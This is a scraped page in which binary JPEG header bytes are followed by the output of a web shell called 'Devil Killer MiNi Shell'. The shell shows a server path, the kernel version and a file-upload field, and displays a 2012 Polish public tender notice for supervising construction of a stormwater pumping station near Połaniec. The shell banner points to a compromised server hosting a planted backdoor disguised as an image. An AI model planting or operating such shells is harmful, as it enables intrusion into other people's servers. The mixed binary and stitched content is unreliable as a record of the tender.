JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120629/142413-N-2012.html

<p class="kh_header"><b>Kielce: pełnienie nadzoru inwestorskiego nad realizacją zadania p.n. Budowa przepompowni wód deszczowych w miejscowości Łęg na Cieku od Okrągłej, gm. Połaniec</b><br>
<b>Numer ogłoszenia: 142413 - 2012; data zamieszczenia: 29.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach , ul. Witosa 86, 25-561 Kielce, woj. świętokrzyskie, tel. 041 3340105 wew. 209, 309, faks 041 3340105 wew. 409.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szmiuw.kielce.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojewódzka samorządowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> pełnienie nadzoru inwestorskiego nad realizacją zadania p.n. Budowa przepompowni wód deszczowych w miejscowości Łęg na Cieku od Okrągłej, gm. Połaniec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest pełnienie nadzoru inwestorskiego nad realizacją zadania 
p.n.: Budowa przepompowni wód deszczowych w miejscowości Łęg na Cieku od Okrągłej,  gm. Połaniec, wykonywanego zgodnie z opracowaną przez Biuro Inżynierii Środowiska Inżynieria Jan Macheta, Os. Barwinek 15/70, 25-150 Kielce, dokumentacją projektową obejmującą:
- Projekt wykonawczy zawierający: opis techniczny wraz z częścią rysunkową, specyfikację techniczną wykonania i odbioru robót budowlanych, przedmiar robót (mający wyłącznie charakter informacyjny); - Projekt budowlano-wykonawczy - część elektryczna - zawierający: opis techniczny wraz z częścią rysunkową, specyfikację techniczną wykonania i odbioru robót budowlanych, przedmiar robót (mający wyłącznie charakter informacyjny); -aneks do projektu budowlanego  pn.: Budowa przepompowni wód deszczowych w miejscowości Łęg, gm. Połaniec wraz z częścią rysunkową. Wykonawca musi zapewnić nadzór inwestorski przy realizacji w/w zadania, w ramach którego będzie sprawowany nadzór inwestorski nad robotami budowlano - montażowymi (w zakresie melioracji wodnych) i elektrycznymi. Celem inwestycji jest zabezpieczenie przeciwpowodziowe terenów zabudowanych oraz użytków rolnych z części obszaru miejscowości Łęg, Okrągła i Połaniec. Opis inwestycji oraz szczegółowy zakres rzeczowy robót związanych z jej realizacją przedstawiony został w dokumentacji projektowej oraz w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych udostępnionych na stronie internetowej: www.szmiuw.kielce.com.pl oraz w siedzibie Zamawiającego. 1.1 Zakres robót, nad którymi sprawowany będzie nadzór inwestorski: -	komora pomp wraz z ujęciem. Pompownia wyposażona zostanie w agregaty pompowe o parametrach: wydajność Q=2988 l/s (3 szt.); wysokość podnoszenia H=4,5m; zapotrzebowanie mocy Ns=3x60 kW; obroty 725 obr./min. ;
-	komora zasuw wyposażona w armaturę technologiczną (kompensatory montażowe, przepustnice zwrotne, przepustnice z napędem ręcznym  i elektrycznym). ;
-	rurociągi tłoczne łączące komorę zasuw z komorą zrzutową. ;
-	komora zrzutowa ;
-	kanał odpływowy ;
-	zbiornik wyrównawczy przed pompownią - zbiornik o pow. 0,45 ha. ;
-	przepust drogowy ;
-	zabezpieczenie wału przeciwpowodziowego - ścianka szczelna stalowa o długości 15m,  na dł. 160m, otaczająca śluzę od wlotu.;
-	przedłużenie istniejącej śluzy wałowej  2   fi 1,4 m - L=5,0m;
-	przełożenie klap zwrotnych na wylot z przepustu po przebudowie przyczółka wylotowego;
-	zakup i montaż kontenera energetycznego wraz z urządzeniami elektrycznymi,;
-	przebudowa linii energetycznej kablowej nn i przebudowa stacji trafo z wymianą transformatora i zabudową układu pomiarowego energii elektrycznej,;
-	wykonanie: rozdzielni nn do zasilania i sterowania przepompownią, linii kablowych nn zasilających pompy, linii kablowych nn zasilających przepustnice, linii kablowych nn do sterowania pompami i przepustnicami, oświetlenie terenu pompowni.;
-	wykonanie systemu monitoringu i sterowania zdalnego  pompowni, instalacji telewizji dozorowej CCTV, instalacji sygnalizacji włamania;. W zakres robót wchodzi również wykonanie podłączeń oraz dokonanie rozruchu urządzeń energetycznych. Z dokumentacją techniczną w formie pisemnej można zapoznać się w ŚZMiUW w Kielcach, ul. Witosa 86 (II piętro, p. 212) w dni robocze w godz. 8:00 - 14:00. Zakres obowiązków inspektorów nadzoru inwestorskiego określa Rozdział 3 (art. 25-26) ustawy Prawo budowlane z dnia 7 lipca 1994 r. (t.j. Dz. U. z 2010 r. Nr 243 poz. 1623 z późn. zm.). Inspektor Nadzoru jest przedstawicielem Zamawiającego wobec Wykonawcy robót budowlanych, w granicach posiadanego umocowania określonego w umowie. Inspektor Nadzoru Inwestorskiego winien współpracować z Zamawiającym zapewniając sprawną, zgodną z dokumentacją projektową i pozwoleniem na budowę, obsługę realizacji zadania, jego odbioru oraz rozliczenia, tj. sprawdzania kompletności wszystkich dokumentów Wykonawcy robót budowlanych przygotowanych do odbioru końcowego i ich zgodności  z dokumentacją projektową, potwierdzanie dokumentów Zamawiającego związanych  z pozyskaniem i rozliczeniem środków finansowych na realizację zadania. 1.2 Ponadto przedmiot zamówienia obejmuje m.in.:
a)	Współdziałanie z Zamawiającym w zakresie technicznym, kosztowo-rozliczeniowym w tym sprawdzanie zakresu rzeczowego i kosztorysów zapewniając przy tym sprawną, zgodną z dokumentacją projektową i pozwoleniem na budowę, obsługę realizacji zadania, jego odbioru oraz rozliczenia, tj. sprawdzania kompletności wszystkich dokumentów Wykonawcy robót budowlanych przygotowanych do odbioru końcowego i ich zgodności z dokumentacją projektową,;

b)	Udział w przekazaniu Wykonawcy robót budowlanych, placu budowy.;

c)	Współdziałanie z Zamawiającym w zakresie problematyki robót zamiennych lub  dodatkowych wychodzących poza zakres rzeczowy umowy na roboty budowlane, w tym sprawdzanie zakresu rzeczowego i kosztorysów.;

d)	Przygotowanie w trakcie realizacji robót projektów aneksów do umów o ewentualne roboty budowlane, zamienne lub dodatkowe, lub opiniowanie takich projektów przygotowanych przez Zamawiającego.;

e)	Udział w naradach technicznych dotyczących wykonywanych robót.;

f)	Przygotowywanie wspólnie z Wykonawcą projektu podziału zadania na elementy do fakturowania i odbioru.;

g)	Współdziałanie z nadzorem autorskim w czasie trwania realizacji przedmiotu umowy celem rozwiązywania bieżących problemów realizacyjnych dla zabezpieczenia interesów Inwestora.;

h)	Udział w załatwianiu spraw spornych z miejscową ludnością oraz skarg wynikających z realizowanych robót, w tym prowadzenie ewentualnych negocjacji w konfliktach z władzami samorządowymi i mieszkańcami;

i)	Opracowanie i przedstawienie do akceptacji Zamawiającemu w terminie 1 dzień przed podpisaniem umowy schematu organizacyjnego zespołu Wykonawcy wraz ze szczegółowym zakresem obowiązków i uprawnień, jakie zamierza powierzyć poszczególnym członkom zespołu, wraz ze wskazaniem koordynatora zespołu nadzoru.;

j)	Dostarczenie w terminie 1 dzień przed podpisaniem umowy oświadczeń inspektorów nadzoru wchodzących w skład zespołu stwierdzających przyjęcie obowiązków inspektorów nadzoru nad inwestycja.;

k)	Zapewnienie codziennego pobytu na budowie w trakcie realizacji robót oraz na każde wezwanie Zamawiającego. Potwierdzeniem pobytu jest wpis do dziennika budowy;

l)	Nadzorowanie budowy, a także zapewnienie nadzoru inwestorskiego nad realizacją inwestycji, a w szczególności monitorowanie realizacji inwestycji, nadzorowanie i odbiór robót, kontrola jakości materiałów do stosowania przy wykonywaniu ścianki szczelnej stalowej (kontrola w trakcie wykonywania przegrody, a także po wykonaniu przegrody, zgodnie ze Specyfikacją Techniczną Wykonania i Odbioru Robót), w częstotliwości zapewniającej skuteczny nadzór (inspektor nadzoru pełniący funkcje koordynatora zespołu nadzoru - obecność codzienna; pozostały inspektor - w częstotliwości zależnej od rodzaju wykonywanych robót); Inspektor Nadzoru ponosi odpowiedzialność za wszelkie opóźnienia, nieprawidłowości lub wady, do których przyczynił się w szczególności poprzez brak zapewnienia wymaganego przepisami prawa lub umową nadzoru. Potwierdzeniem pobytu jest wpis do dziennika budowy. Poszczególni inspektorzy nadzoru mają prawo dokonywać zapisu w dzienniku budowy wyłącznie w zakresie powierzonych im czynności nadzoru.;

m)	Bieżąca kontrola - sprawdzanie pod względem merytorycznym i formalno-prawnym faktur wykonawcy robót budowlanych oraz załączonych protokołów odbioru (częściowych bądź końcowego) i kosztorysów - w terminie do 3 dni od ich otrzymania; 
Każdorazowe sprawdzanie kosztorysów pod względem merytorycznym i formalno-rachunkowym;

n)	Dokonywanie odbiorów częściowych w terminie określonym w harmonogramie rzeczowo-finansowym oraz udział w odbiorze końcowym zadania, a także nadzór nad usunięciem stwierdzonych usterek i niedoróbek.;

o)	Kontrolować przestrzeganie przez Wykonawcę zasad BHP, wstrzymać roboty w przypadku prowadzenia ich niezgodnie z zamówieniem i przepisami BHP;

p)	Wyrywkowa kontrola stopnia zagęszczenia gruntu.;

q)	Wykonywanie kontrolnych pomiarów geodezyjnych.;

r)	Udział w przeglądach gwarancyjnych.;

s)	Końcowe rozliczenie zadania wraz ze sporządzeniem wymaganych dokumentów w tym kompletność operatu powykonawczego;

t)	Przekazywanie na bieżąco Inwestorowi informacji z rzeczowego i finansowego zaawansowania realizacji zadania, a także informacje o wszelkich problemach związanych z realizacją inwestycji;

u)	Współdziałanie z Wykonawcą robót i Zamawiającym w celu uzyskania decyzji o pozwoleniu na użytkowanie.__ 2. Termin wykonania zamówienia: Od dnia podpisania umowy do dnia 14-12-2012 r. Umowa na pełnienie nadzoru inwestorskiego podpisana zostanie po podpisaniu umowy z Wykonawcą robót budowlanych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium ustala się w kwocie 3 000,00 zł (słownie: trzy tysiące zł 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonania w okresie ostatnich trzech lat przed upływem składania ofert - a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch usług pełnienia funkcji nadzoru nad inwestycjami budowlanymi polegającymi na wykonaniu robót (budowa, rozbudowa,) - minimum 2 kontraktów w zakresie usług objętych przedmiotem zamówienia w tym nadzorem nad zadaniami (robotami) o podobnym charakterze, co przedmiot zamówienia o łącznej wartości brutto robót nie mniejszej niż 7.000.000,00 zł w tym jedna o wartości min 4.500.000,00 zł.  Przez podobny charakter przedmiotu zamówienia rozumie się:
- pełnienie usług w zakresie rzeczowym wynikającym z opisu przedmiotu zamówienia (co najmniej dla jednej usługi), o których mowa w sekcji II.1.3 pkt. 1.2 lit.: a,c,d,h,m i s ( zakresie rozliczenia końcowego); - pełnienie nadzoru nad budową lub przebudową 2 (dwóch) przepompowni, o których mowa powyżej (w celu zabezpieczenia przeciwpowodziowego terenów rolnych i zabudowanych) o następujących parametrach:a) powierzchnia zlewni odwadnianej przez przepompownie - min. dla każdej 20,0 km2, b)	wydajność łączna pomp - min 2,0 m3/s dla każdej przepompowni z wysokością podnoszenia min. 4,0 m dla każdej przepompowni, wraz ze zbiornikiem wyrównawczym i urządzeniami technologicznymi w tym każdego rurociągu tłocznego o dł. min. 20 mb, c)	odbudowa wałów o min. dł. 150 mb łącznie wraz z zabezpieczeniem wałów z wykonaniem przesłony i uszczelnieniem (min. przesłona cementowo-bentonitowa i uszczelnienie - m.in. bentomatą), w ramach budowy lub przebudowy pompowni. d)	wykonanie monitoringu i sterowania pompowni wraz z instalacją telewizji dozorowej, co najmniej dla jednej przepompowni,e)	wykonanie w obiektach kubaturowych robót budowlanych, sanitarnych i elektrycznych (w tym zakresie stacji trafo i linii zasilającej), co najmniej dla jednej przepompowni), f)	wykonanie robót drogowych min. placu manewrowego o pow. łącznej min 200m2 w ramach budowy lub przebudowy pompowni. Na potwierdzenie spełnienia warunku należy złożyć poniższe  dokumenty: 2. Sporządzony przez Wykonawcę wykaz nadzorów inwestorskich w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i posiadania doświadczenia  we wzorze stanowiącym załącznik nr 6 do SIWZ. W wykazie tym należy potwierdzić spełnienie warunków określonych w pkt 1. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentów oryginał.  3. Dokumenty potwierdzające, że nadzory przedstawione w wykazie  zrealizowanych zadań zostały wykonane należycie, np. referencje. Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę lub upoważnionego pełnomocnika</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca winien dysponować Inspektorami nadzoru:a) Jedna osoba posiadająca uprawnienia w specjalności odpowiedniej do nadzorowania robót z zakresu melioracji wodnych pełniąca funkcję koordynatora zespołu inspektorów nadzoru. Osoba przewidziana 
do pełnienia funkcji inspektora  nadzoru (koordynatora) winna posiadać doświadczenie w nadzorowaniu robót budowlanych, w tym minimum jednej budowy w zakresie budowy lub przebudowy pompowni wód deszczowych o parametrach, o których mowa w sekcji III .3.2 pkt 1 lit a, b niniejszego ogłoszenia.; b)	jedna osoba posiadająca uprawnienia w specjalności odpowiedniej do nadzorowania robót elektrycznych posiadająca doświadczenie w nadzorowaniu robót elektrycznych w tym, co najmniej w jednym nadzorze robót w zakresie monitoringu, systemów sterowania czy systemów telewizji dozorowej.; c)	jedna osoba posiadającą uprawnienia o specjalności konstrukcyjno - budowlanej (bez ograniczeń) lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniejszych przepisów.Na potwierdzenie spełnienia powyższych warunków należy złożyć poniższe dokumenty:    2. Wykaz osób które będą uczestniczyć w wykonaniu zamówienia, spełniający wymagania określone w pkt. 1  we wzorze stanowiącym załączniki nr 2 do SIWZ wraz z informacją o sposobie dysponowania tymi osobami. W wykazie należy udokumentować kwalifikacje zawodowe, w stosunku do osób, wymienionych w  pkt. 1. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentu - oryginał. 3. Do wykazu należy złączyć oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają uprawnienia wymagane prawem - według wzoru stanowiącego załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca powinien posiadać środki finansowe lub zdolność kredytową w wysokości 100 000 zł. 

2.Wykonawca powinien posiadać ubezpieczenie  od odpowiedzialności cywilnej w zakresie prowadzenia działalności związanej z przedmiotem zamówienia na kwotę co najmniej 500 000 zł.

3. Warunek w zakresie pkt. 1 - 4.1. - informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków lub zdolność kredytową Wykonawcy - wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie.
Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę lub upoważnionego pełnomocnika. Informacja winna potwierdzać spełnienie warunku określonego w pkt. 1,. Jeżeli Wykonawca, wykazując spełnienie warunku, o którym mowa w powyższych punktach, polega na zdolnościach finansowych innych podmiotów na zasadach określonych art.26 ust. 2b ustawy, wymaga się przedłożenia informacji o której mowa w wyżej, dotyczącej tych podmiotów. 4. Warunek w zakresie pkt. 2  - opłacona polisa a przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę lub upoważnionego pełnomocnika. Przedłożony dokument winien potwierdzać spełnienie warunku określonego w pkt. 2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy wg wzoru określonego w załączniku nr 1 do SIWZ     Wymagana forma dokumentu - oryginał. 2.	Pełnomocnictwo - jeżeli upoważnienie do podpisania oferty nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy - nie dotyczy pełnomocnictwa w zakresie oferty Wykonawców wspólnie ubiegających się o zamówienie. Wymagana forma dokumentu oryginał lub kserokopia poświadczona notarialnie.  3.	Pełnomocnictwo w przypadku oferty Wykonawców występujących wspólnie o udzielenie zamówienia, o którym mowa w rozdz. IX SIWZ. Forma dokumentu oryginał lub kopia poświadczona notarialnie. 4.	Na podstawie art. 25 ust. 1 ustawy w przypadku prowadzenia działalności w formie spółki cywilnej gdy jest więcej niż jeden przedsiębiorca (wspólnik) należy do oferty załączyć kserokopię umowy spółki poświadczoną za zgodność z oryginałem przez wszystkich wspólników lub pełnomocnika (wspólnika) umocowanego do takiej czynności. 
Warunek nie ma zastosowania w odniesieniu do spółek jawnych w przypadku załączenia do oferty aktualnego odpisu z właściwego rejestru - Krajowego Rejestru Sądowego, jeżeli ujawniono w nim wspólników spółki, oraz sposób reprezentowania spółki (składania oświadczeń woli).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
